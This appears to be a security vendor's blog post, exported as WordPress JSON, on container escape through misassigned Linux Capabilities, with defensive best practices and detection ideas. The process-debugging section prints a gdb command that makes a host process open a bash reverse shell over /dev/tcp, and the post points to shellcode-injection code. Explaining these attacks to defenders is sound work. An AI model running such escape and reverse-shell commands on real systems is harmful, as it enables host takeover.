{"id":24865,"date":"2023-06-23T15:30:00","date_gmt":"2023-06-23T15:30:00","guid":{"rendered":"https:\/\/nsfocusglobal.com\/?p=24865"},"modified":"2026-04-17T18:07:40","modified_gmt":"2026-04-17T18:07:40","slug":"an-insight-into-rsa-2023-capabilities-utilization-for-container-escape","status":"publish","type":"post","link":"https:\/\/nsfocusglobal.com\/pt-br\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/","title":{"rendered":"An Insight into RSA 2023: Capabilities Utilization for Container Escape"},"content":{"rendered":"<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/REC-html40\/loose.dtd\">\n<html><body><p>At the RSA Conference this year, researchers from Cybereason presented &#8220;Container Escape: All You Need Is Cap (Capabilities)&#8221;, detailing three methods of using Capabilities for container escape, in the hope that users will pay attention to how Capabilities are allocated to containers and follow best practices. This article describes the technical principles of abusing Capabilities for container escape, <a href=\"https:\/\/nsfocusglobal.com\/pt-br\/security-risks-and-threats-of-containerized-infrastructure\/\" target=\"_blank\" rel=\"noreferrer noopener\">one of the security risks and threats of containerized infrastructure.<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">I. Capabilities Utilization<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">Introduction to Capabilities<\/h3>\n\n\n\n<p>The Capabilities mechanism was introduced after version 2.2 of the Linux kernel. It divides root permissions into finer-grained units so that they can be granted on demand. 
Common Capabilities information can be found on the Linux manual page [1], with some examples shown in Figure 1:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22.jpg\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-1024x576.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24867\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-1024x576.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-300x169.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-768x432.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-150x85.jpg 150w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-600x338.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22-200x113.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-22.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 1 Capabilities Permissions and System Calls<\/p>\n\n\n\n<p>Most Capabilities are atomic and cover a limited number of system calls, but some grant excessively broad permissions, such as CAP_SYS_ADMIN:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23.jpg\"><img decoding=\"async\" width=\"760\" height=\"826\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24869\" 
srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23.jpg 760w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23-276x300.jpg 276w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23-600x652.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-23-200x217.jpg 200w\" sizes=\"(max-width: 760px) 100vw, 760px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 2 CAP_SYS_ADMIN Details<\/p>\n\n\n\n<p>As shown in Figure 2, the official documentation also points out the risk of this permission being &#8220;overloaded&#8221;, which researchers analyzed as early as the article &#8220;CAP_SYS_ADMIN: the new root&#8221; <sup>[2]<\/sup>. CAP_SYS_ADMIN not only allows the execution of system calls such as mount, umount, and quotactl, but also includes the permissions of other Capabilities, such as CAP_PERFMON, CAP_BPF and CAP_CHECKPOINT_RESTORE.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Capabilities Discovery<\/strong><\/h3>\n\n\n\n<p>By default, the Docker container has the Capabilities shown in Figure 3:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640.png\"><img decoding=\"async\" width=\"994\" height=\"123\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640.png\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24895\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640.png 994w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640-300x37.png 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640-768x95.png 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640-600x74.png 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/640-200x25.png 200w\" sizes=\"(max-width: 994px) 100vw, 994px\" 
\/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 3: Default Capabilities in Docker V20.10.7<\/p>\n\n\n\n<p>You can also explicitly assign specific Capabilities when starting a container, based on business needs, in the following ways:<\/p>\n\n\n\n<p>1) Add a specified Capability:<\/p>\n\n\n\n<p>docker run --cap-add= -it<\/p>\n\n\n\n<p>2) Add all Capabilities:<\/p>\n\n\n\n<p>docker run --cap-add=ALL -it<\/p>\n\n\n\n<p>3) Drop a specified Capability:<\/p>\n\n\n\n<p>docker run --cap-drop= -it<\/p>\n\n\n\n<p>4) Drop all Capabilities:<\/p>\n\n\n\n<p>docker run --cap-drop=ALL -it<\/p>\n\n\n\n<p>In Kubernetes, Capabilities can be configured through the securityContext field:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"677\" height=\"621\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24873\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1.jpg 677w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1-300x275.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1-600x550.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-24-1-200x183.jpg 200w\" sizes=\"(max-width: 677px) 100vw, 677px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 4 SecurityContext Configuration in Kubernetes<\/p>\n\n\n\n<p>In real container attack and defense scenarios, the Capabilities of a container can be viewed with the cat \/proc\/1\/status command, as shown in Figure 5:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a 
href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"637\" height=\"230\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24875\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25.jpg 637w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25-300x108.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25-600x217.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-25-200x72.jpg 200w\" sizes=\"(max-width: 637px) 100vw, 637px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 5 Capabilities Discovery<\/p>\n\n\n\n<p>The Capabilities values are displayed as bitmasks. To make them readable, decode them with the capsh --decode=CAP_BITMASK command (most container environments do not have the capsh tool installed), as shown in Figure 6:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"162\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-1024x162.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24877\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-1024x162.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-300x48.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-768x122.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-600x95.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26-200x32.jpg 200w, 
https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-26.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 6 CAP BITMASK Decoding<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Utilizing CAP_SYS_MODULE for Container Escape<\/strong><\/h3>\n\n\n\n<p>The CAP_SYS_MODULE permission allows for the installation and uninstallation of kernel modules, as shown in Figure 7:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"713\" height=\"136\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24879\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27.jpg 713w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27-300x57.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27-600x114.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-27-200x38.jpg 200w\" sizes=\"(max-width: 713px) 100vw, 713px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 7 Details of CAP_SYS_MODULE<\/p>\n\n\n\n<p>When the container is granted this permission, attackers can install custom modules inside the container. One way is to upload a precompiled kernel module; because of differences between kernel versions, a precompiled module may not be universal, but it can be compiled locally in an environment that replicates the target. Another way is to compile directly in the target container environment; for the specific method, see &#8220;Abusing CAP_SYS-MODULE to Cause Container Escape&#8221;<sup>[3]<\/sup>. 
The general principle is shown in Figure 8:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-1024x576.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24881\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-1024x576.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-300x169.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-768x432.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-150x85.jpg 150w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-600x338.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28-200x113.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-28.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 8 Attack process for installing kernel modules<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Utilizing CAP_SYS_PTRACE for Container Escape<\/h3>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"646\" height=\"174\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24883\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29.jpg 646w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29-300x81.jpg 300w, 
https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29-600x162.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-29-200x54.jpg 200w\" sizes=\"(max-width: 646px) 100vw, 646px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 9 Details of CAP_SYS_PTRACE<\/p>\n\n\n\n<p>When a container is assigned the CAP_SYS_PTRACE permission, this permission allows the use of the ptrace system call.<\/p>\n\n\n\n<p>The ptrace() system call is one of the inter-process communication mechanisms provided by Linux systems. Its main function is to allow one process (called the tracer) to monitor and control another process (called the tracee). The tracer process can read and write the registers and memory of the tracee process, and control the execution of the tracee process, such as single-step execution, interrupting execution, etc. The ptrace() system call is typically used to implement debugger tools, such as GDB, for debugging applications, tracking down the cause of program crashes, or generating dump files when the application crashes. ptrace() can also be used to implement code injection and other advanced debugging techniques. 
When the container shares the host&#8217;s PID namespace, an attacker can escape the container through process injection.<\/p>\n\n\n\n<p>The following introduces two methods of using the ptrace() system call for escape.<\/p>\n\n\n\n<p><strong>1) Process Debugging<\/strong><\/p>\n\n\n\n<p>The attack principle of process debugging is shown in Figure 10:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-1024x576.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24885\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-1024x576.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-300x169.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-768x432.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-150x85.jpg 150w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-600x338.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30-200x113.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-30.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 10 Using Process Debugging for Container Escape<\/p>\n\n\n\n<p>The prerequisites for this technique:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CAP_SYS_PTRACE<\/li>\n\n\n\n<li>AppArmor is configured as Unconfined<\/li>\n\n\n\n<li>Shared host pid namespace<\/li>\n<\/ul>\n\n\n\n<p>From inside the container, query the process identifier (PID) of a process running on the host, and then use the gdb command to debug it and execute a command:<\/p>\n\n\n\n<p>gdb -p 
PID<\/p>\n\n\n\n<p>call (void) system (&#8220;bash &#8211; c&#8217;bash &#8211; i&gt;&amp;\/dev\/tcp\/\/0&gt;&amp;1 &#8216;&#8221;)<\/p>\n\n\n\n<p><strong>2) Shellcode Injection<\/strong><\/p>\n\n\n\n<p>The attack principle of shellcode injection is shown in Figure 11:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-1024x576.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24887\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-1024x576.jpg 1024w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-300x169.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-768x432.jpg 768w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-150x85.jpg 150w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-600x338.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31-200x113.jpg 200w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-31.jpg 1080w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 11 Shellcode injection for escape<\/p>\n\n\n\n<p>The prerequisites for this technique:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>CAP_SYS_PTRACE<\/li>\n\n\n\n<li>AppArmor is configured as Unconfined<\/li>\n\n\n\n<li>Shared host pid namespace<\/li>\n<\/ul>\n\n\n\n<p>After querying the host process identifier, execute the injection code<sup>[4]<\/sup>:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a 
href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"494\" height=\"129\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24889\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32.jpg 494w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32-300x78.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-32-200x52.jpg 200w\" sizes=\"(max-width: 494px) 100vw, 494px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 12 Shellcode Injection Process<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">II. Defense and Detection<\/h1>\n\n\n\n<p>In real business deployments, the allocation of Capabilities to containers is not always strictly restricted. Most open-source applications are often granted higher Capabilities permissions when deployed in containers, as shown in Figure 13:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"763\" height=\"618\" src=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33.jpg\" alt=\"Red circular no entry sign with a white horizontal bar.\" class=\"wp-image-24891\" srcset=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33.jpg 763w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33-300x243.jpg 300w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33-600x486.jpg 600w, https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/Figure-33-200x162.jpg 200w\" sizes=\"(max-width: 763px) 100vw, 763px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-small-font-size\">Figure 13 Parameter 
Details of Container Deployment for Open Source Projects<\/p>\n\n\n\n<p>So how can an enterprise defend against and detect such threats? The following are best practices for container use and some detection ideas.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Best Practices for Container Usage<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>When creating a container, drop the existing Capabilities first, and then manually add the required ones back with --cap-add to ensure the reasonable use of Capabilities<\/li>\n\n\n\n<li>Avoid using privileged containers and avoid granting CAP_SYS_ADMIN<\/li>\n\n\n\n<li>Run container-based workloads as a non-root user<\/li>\n\n\n\n<li>Configure the allowPrivilegeEscalation flag to disable privilege escalation<\/li>\n\n\n\n<li>Improve the Seccomp policy<sup>[5]<\/sup> to limit the execution of malicious system calls<\/li>\n\n\n\n<li>Improve the AppArmor policy to restrict access to system resources<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Detection Ideas<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Monitor container resources running with suspicious or unknown images<\/li>\n\n\n\n<li>Monitor suspicious system calls initiated from within the container, such as init_module, ptrace, etc.<\/li>\n\n\n\n<li>Monitor suspicious processes spawned on containers or hosts<\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">III. Conclusion<\/h1>\n\n\n\n<p>This article introduces techniques for container escape that abuse Capabilities permissions. Unlike vulnerability exploitation, abusing such insecure configurations is simpler and more practical. The reason is that enterprise users running container environments may promptly fix the affected cloud-native infrastructure, upgrade versions, or apply patches based on the latest vulnerability notifications, but often overlook the risk of improper configuration. 
Security mechanisms such as Capabilities, Seccomp, and AppArmor have to be configured sensibly by people. However, due to various factors including unskilled staff, lack of security awareness, and lack of practice, it is difficult to achieve best practices during configuration. How to ensure best practices for secure cloud-native environments has become a problem that enterprises need to consider and solve.<\/p>\n\n\n\n<p>NSFOCUS Cloud Native Security Platform (CNSP), based on the CIS Docker Benchmarks<sup>[6]<\/sup> and CIS Kubernetes Benchmarks, has implemented compliance detection capabilities for containers, runtime, orchestration systems, and file orchestration. It can promptly identify and consolidate unsafe configurations in the cloud-native environment, helping users build a secure cloud-native environment:<\/p>\n\n\n\n<p>NSFOCUS CNSP also supports security detection capabilities for cloud-native environments, covering behaviors and activities on hosts and containers, including container escape, reverse shells, container authorization, malicious command execution, backdoor deployment, lateral movement, and other types of attack behaviors.<\/p>\n\n\n\n<p>References<\/p>\n\n\n\n<p>[1] https:\/\/man7.org\/linux\/man-pages\/man7\/capabilities.7.html<\/p>\n\n\n\n<p>[2] https:\/\/lwn.net\/Articles\/486306\/<\/p>\n\n\n\n<p>[3] https:\/\/github.com\/Metarget\/metarget\/tree\/master\/writeups_cnv\/config-cap_sys_module-container<\/p>\n\n\n\n<p>[4] https:\/\/github.com\/0x00pf\/0x00sec_code\/blob\/master\/mem_inject\/infect.c<\/p>\n\n\n\n<p>[5] https:\/\/github.com\/moby\/moby\/blob\/master\/profiles\/seccomp\/default.json<\/p>\n\n\n\n<p>[6] https:\/\/www.cisecurity.org\/benchmark\/docker<\/p>\n<\/body><\/html>\n","protected":false},"excerpt":{"rendered":"<p>At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container 
escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24900,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","footnotes":""},"categories":[3],"tags":[152],"class_list":["post-24865","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","tag-container-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS<\/title>\n<meta name=\"description\" content=\"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. 
This article will provide a detailed introduction to the technical principles of this topic.\" \/>\n<meta name=\"robots\" content=\"noindex, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS\" \/>\n<meta property=\"og:description\" content=\"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nsfocusglobal.com\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\/\" \/>\n<meta property=\"og:site_name\" content=\"NSFOCUS\" \/>\n<meta property=\"article:published_time\" content=\"2023-06-23T15:30:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-17T18:07:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"An Insight into RSA 2023: Capabilities Utilization for Container Escape - NSFOCUS\" \/>\n<meta name=\"twitter:description\" content=\"At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using 
containers and maintain best practices. This article will provide a detailed introduction to the technical principles of this topic.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/nsfocusglobal.com\/wp-content\/uploads\/2023\/06\/container.png\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#\\\/schema\\\/person\\\/fd9ab61c9c77a81bbd870f725cc0c61d\"},\"headline\":\"An Insight into RSA 2023: Capabilities Utilization for Container Escape\",\"datePublished\":\"2023-06-23T15:30:00+00:00\",\"dateModified\":\"2026-04-17T18:07:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/\"},\"wordCount\":1298,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/pt-br\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/nsfocusglobal.com\\\/an-insight-into-rsa-2023-capabilities-utilization-for-container-escape\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/nsfocusglobal.com\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/container.png\",\"keywords\":[\"Container 
